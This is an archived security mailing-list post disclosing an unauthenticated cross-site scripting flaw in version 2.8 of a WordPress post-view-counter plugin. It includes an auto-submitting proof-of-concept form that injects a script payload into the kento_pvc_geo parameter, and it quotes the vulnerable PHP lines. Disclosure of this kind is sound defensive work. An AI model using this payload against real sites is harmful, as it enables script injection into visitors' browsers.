Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 16 Apr 2016 13:41:31 +0530
From: shravan kumar <>
Subject: Unauthenticated XSS Vulnerability in kento-post-view-counter
 Wordpress Plugin 2.8

I would like to disclose  a Unauthenticated XSS vulnerability
in kento-post-view-counter  plugin version 2.8 .

The Plugin can be found at

This Bug can be triggered by unauthenticated / Authenticated user. If a
user is sent a URL by social engineering and the user clicks the link the
bug can be triggered.

The URL should be something like this

The code for XSS_POC.html is as follows:

  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="http://targetsite/wp-admin/admin-ajax.php"
method="POST" >

  <input type="hidden" name="action" value="kento_pvc_top_geo" />
  <input type="hidden" name="kento_pvc_geo" value="
<script>alert(1);</script>" />
      <input type="submit" value="Submit" />

Technical Details:

The vulnerable page is


The Code responsible for the vulnerability :

LINE NO 219 onwards
$geo = $_POST['kento_pvc_geo'];
$geo ="country";
Line No 240
$top_geo.= "<th scope='col' class='manage-column column-name' ><strong>"

Line No 245

$top_geo.= "<th scope='col' class='manage-column column-name' ><strong>"

Line No 283

echo $top_geo;

The $top_geo parameter is displayed in unsafe manner without escaping HTML
chars .

The vulnerable POST parameters is:

   - kento_pvc_geo

Shravan Kumar

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ